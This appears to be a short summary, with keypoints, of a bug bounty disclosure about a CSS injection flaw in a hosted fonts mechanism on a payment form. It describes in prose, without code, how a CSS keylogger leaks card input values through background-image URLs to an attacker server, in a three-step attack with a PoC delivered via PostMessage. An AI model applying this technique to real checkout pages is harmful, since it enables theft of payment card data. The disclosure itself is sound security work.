The article exposes a CSS injection vulnerability in a hosted fonts mechanism used in a private bug bounty workflow. It explains how CSS can leak credit card data by exfiltrating input values through background-image URLs and outlines the 3-step attack flow, including a PoC delivered via PostMessage, ending with specific indicators such as the hosted payment form and redacted domains #CSSKeylogger #CSSInjection #checkout.redacted.com #redacted.com #HostedParams
Keypoints
- Discloses a CSS injection vulnerability via a hosted fonts mechanism in a private bug bounty workflow.
- Explains how CSS can be used to leak credit card data by exfiltrating input values through background images URLs.
- Describes a CSS keylogger concept and its limitations, including handling of repeats and special keys.
- Outlines a multi-step attack flow: victim clicks attacker link, enters card details, data is exfiltrated to attacker server.
- Provides a PoC demonstrating how to craft and deliver CSS payloads to a hosted payment form using PostMessage.